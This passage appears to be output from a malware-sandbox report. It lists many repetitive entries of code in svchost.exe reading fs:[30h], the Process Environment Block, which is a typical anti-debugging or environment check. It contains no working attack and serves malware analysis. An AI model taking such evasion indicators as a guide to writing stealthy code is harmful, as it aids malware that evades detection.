            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
